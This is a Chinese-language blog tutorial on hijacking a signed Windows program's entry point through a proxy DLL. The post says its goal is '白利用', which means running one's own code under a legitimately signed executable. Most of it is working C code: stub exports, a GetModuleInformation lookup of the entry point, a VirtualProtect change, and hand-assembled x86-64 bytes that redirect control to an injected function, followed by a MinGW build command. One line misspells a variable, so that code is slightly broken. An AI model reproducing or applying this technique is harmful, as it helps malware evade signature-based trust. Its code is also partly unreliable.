<!DOCTYPE html>
<html lang="zh-Hans"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>提线木偶：利用 DLL 劫持实现 Win32 程序入口点劫持（x86-64） | U.M.R Powered Blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="提线木偶：利用 DLL 劫持实现 Win32 程序入口点劫持（x86-64）" />
<meta name="author" content="U.M.R Powered" />
<meta property="og:locale" content="zh_Hans" />
<meta name="description" content="TLDR" />
<meta property="og:description" content="TLDR" />
<link rel="canonical" href="https://umrpowered.codeberg.page/2023/06/09/win32-exe-entrypoint-hijack.html" />
<meta property="og:url" content="https://umrpowered.codeberg.page/2023/06/09/win32-exe-entrypoint-hijack.html" />
<meta property="og:site_name" content="U.M.R Powered Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-06-09T09:40:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="提线木偶：利用 DLL 劫持实现 Win32 程序入口点劫持（x86-64）" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"U.M.R Powered"},"dateModified":"2023-06-09T09:40:00+08:00","datePublished":"2023-06-09T09:40:00+08:00","description":"TLDR","headline":"提线木偶：利用 DLL 劫持实现 Win32 程序入口点劫持（x86-64）","mainEntityOfPage":{"@type":"WebPage","@id":"https://umrpowered.codeberg.page/2023/06/09/win32-exe-entrypoint-hijack.html"},"url":"https://umrpowered.codeberg.page/2023/06/09/win32-exe-entrypoint-hijack.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://umrpowered.codeberg.page/feed.xml" title="U.M.R Powered Blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">U.M.R Powered Blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/links/">Links</a><a class="page-link" href="/tags">Tags</a><a class="page-link" href="/tools/">Tools</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <style type="text/css">
div.post-content p {
  text-indent: 2em;
}
</style>
<!-- BEGIN copy-pasted part from Jekyll Minima theme -->
<article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">提线木偶：利用 DLL 劫持实现 Win32 程序入口点劫持（x86-64）</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2023-06-09T09:40:00+08:00" itemprop="datePublished">2023/06/09 09:40:00 CST
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h2 id="tldr">TLDR</h2>

<p>这是一篇教读者使用 <code class="language-plaintext highlighter-rouge">GetModuleInformation()</code> 获取进程入口点，并向入口点地址写入精心构造的二进制指令，从而劫持目标程序入口点，实现白利用的教程。</p>

<p>本教程使用 MinGW-w64 工具链，目标平台是 Windows（x86-64）。改变构造指令的方式后，也可迁移到其它 Win32 环境内。</p>

<p>注意：被劫持的进程 <strong>不会</strong> 执行原有的代码。</p>

<h2 id="前置知识">前置知识</h2>

<ul>
  <li><a href="https://www.freebuf.com/articles/system/227824.html">DLL 劫持与白利用（Freebuf）</a></li>
  <li><a href="https://zhuanlan.zhihu.com/p/21821787">饥荒游戏扫雷笔记（一）｜脚本引擎篇——LuaJIT的救赎（合集）</a>，内有 DLL 劫持。</li>
</ul>

<h2 id="寻找目标程序">寻找目标程序</h2>

<p>合适的目标程序需要在导入表（Import table）内定义至少一个条件合适的 DLL，即：</p>
<ul>
  <li>（Windows 7 以后）该 DLL 不在注册表 <code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs</code> 项目之列。</li>
  <li>该 DLL 对外暴露若干 C 函数（不以 <code class="language-plaintext highlighter-rouge">@</code> 开头）。</li>
  <li>程序加载该 DLL 的时候会调用其 <code class="language-plaintext highlighter-rouge">DllMain()</code></li>
</ul>

<p>DLL 之所以需要出现在导入表中，是因为这些 DLL 会在控制流到达程序入口点之前加载，它们的 DllMain 也会在程序执行前执行。</p>

<p>如果读者的目标是「白利用」，目标程序最好带有有效的数字签名。</p>

<p><a href="https://ntcore.com/?page_id=388">CFF Explorer</a> 和 <code class="language-plaintext highlighter-rouge">objdump -x</code> 都可以查看可执行文件的导入表和导出表。</p>

<h2 id="制作占位-dll">制作占位 DLL</h2>

<p>AheadLib 可以方便的生成伪造 DLL 的代码，并把所有调用转发到真实的 DLL 中。利用 <code class="language-plaintext highlighter-rouge">jmp</code> 指令跳转到真实函数后，函数调用的栈平衡问题也迎刃而解。</p>

<p>本篇教程要制作的东西是「提线木偶」，不需要逐一转发调用。此情景下的栈平衡问题也很好解决：只要函数不返回，栈平衡问题就不会出现。</p>

<pre><code class="language-C">#define ENTRY(name) \
__declspec(dllexport) void name() { while (1) { Sleep(30000); } }

ENTRY(D3D11CreateDevice)
</code></pre>

<h2 id="寻找入口点">寻找入口点</h2>
<p>PSAPI 中的 <a href="https://learn.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-getmoduleinformation"><code class="language-plaintext highlighter-rouge">GetModuleInformation()</code></a> 不仅可以传入 hModule 获取模块信息，也可以获取所在进程本身的信息。当 hModule 为 NULL 时，<code class="language-plaintext highlighter-rouge">GetModuleInformation()</code> 会返回进程本身（或称可执行程序映像本身）的模块信息。</p>

<p>GetModuleInfomation 的结果包含我们需要的入口点地址。</p>

<pre><code class="language-C">void* getEntryPoint() {
    MODULEINFO modInfo;
    BOOL res;
    res = GetModuleInformation(
        GetCurrentProcess(),
        NULL,
        &amp;modInfo,
        sizeof(modInfo)
    );
    if (!res) return NULL;
    return modInfo.EntryPoint;
}
</code></pre>

<p>作者是怎么知道这些的呢？<a href="https://blog.sakurakooi.dev/">Kooi</a> 告诉作者的（逃）。</p>

<h2 id="劫持入口点控制流">劫持入口点控制流</h2>

<p>向入口点写入一串跳转（或调用）指令，跳转到我们定义的函数里，就能劫持入口点了。构造指令的方式相对简单：使用 x86-64 的间接调用（或间接跳转）指令，跳转到我们定义的函数开头即可。</p>

<p>找到构造方式并不难：查阅 x86-64 汇编手册，或使用 GCC 内联汇编并观察输出结果均可。</p>

<p>注意使用 <code class="language-plaintext highlighter-rouge">VirtualProtect()</code> 令入口点可写，指令序列写入后再恢复原有保护状态（通常是 <code class="language-plaintext highlighter-rouge">PAGE_EXECUTE_READ</code>）。</p>

<pre><code class="language-C">#include &lt;windows.h&gt;
#include &lt;string.h&gt;
#include &lt;psapi.h&gt;
#include &lt;stdint.h&gt;

__declspec(dllexport)
void ourFunction() {
    MessageBox(NULL, "Hello world!", "Hello", MB_OK);
}

uint64_t pfnOurFunction;

__declspec(dllexport)
void hijackModule() {
    MODULEINFO modInfo;
    BOOL res;
    res = GetModuleInformation(
            GetCurrentProcess(),
            NULL,
            &amp;modInfo,
            sizeof(modInfo)
    );
    if (!res) return;
    void* entryPoint = modInfo.EntryPoint;
    uint8_t codes[] = {
        // movabsq $0,%rax
        0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        // callq *%rax
        0xff, 0xd0,
        // retq
        0xc3,
        // nop
        0x90, 0x90, 0x90
    };
    pfnOurFunction = (uint64_t)ourFunction;
    memcpy(codes+2, &amp;pfnOurFunction, sizeof(pfnOurFuncion));

    DWORD oldProtect;
    VirtualProtect(entryPoint, sizeof(codes), PAGE_EXECUTE_READWRITE, &amp;oldProtect);
    memcpy(entryPoint, &amp;codes, sizeof(codes));

    VirtualProtect(entryPoint, sizeof(codes), PAGE_EXECUTE_READ, &amp;oldProtect);
}
</code></pre>

<p>控制流进入程序入口点时，剩余的栈空间可能相当紧张。此时可考虑在 <code class="language-plaintext highlighter-rouge">ourFunction</code> 内执行 <code class="language-plaintext highlighter-rouge">while (1) Sleep(1000);</code> 死循环，并另行启动新线程执行代码。</p>

<h2 id="使用-mingw-w64-编译">使用 MinGW-w64 编译</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x86_64-w64-mingw32-gcc-win32 yourcode.c -o yourcode.dll -shared -DWIN32_LEAN_AND_MEAN -lpsapi
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">-DWIN32_LEAN_AND_MEAN</code> 可以避免引入不常用的头文件（如 MFC 等）。尝试劫持 <code class="language-plaintext highlighter-rouge">winmm.dll</code> 等 DLL 时，该选项必须启用。</p>

<p>如果读者希望这些代码在 Windows 7 及更早版本的 Windows 上正常运作，编译选项还需增加 <code class="language-plaintext highlighter-rouge">-DPSAPI_VERSION=1</code>。详见 <a href="https://learn.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-getmoduleinformation#remarks">GetModuleInformation#Remarks</a></p>


  </div><a class="u-url" href="/2023/06/09/win32-exe-entrypoint-hijack.html" hidden></a>
</article>
<!-- END copy-pasted part from Jekyll Minima theme -->
<!-- Am I abusing class "site-footer"? -->
<footer class="site-footer">
  <!-- Oops, there is an easier way to add tags. -->
  <a href="/tag/%E6%8A%98%E8%85%BE.html" rel="tag">折腾</a>, <a href="/tag/win32.html" rel="tag">Win32</a>
</footer>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">U.M.R Powered Blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">U.M.R Powered</li><li><a class="u-email" href="mailto:admin@example.org">admin@example.org</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a rel="me" href="https://mastodon.social/@umrpowered"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#mastodon"></use></svg> <span class="username">umrpowered</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>因「U.M.R Powered」希望被搜索引擎顺利检索而搭建起来的简单博客。</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
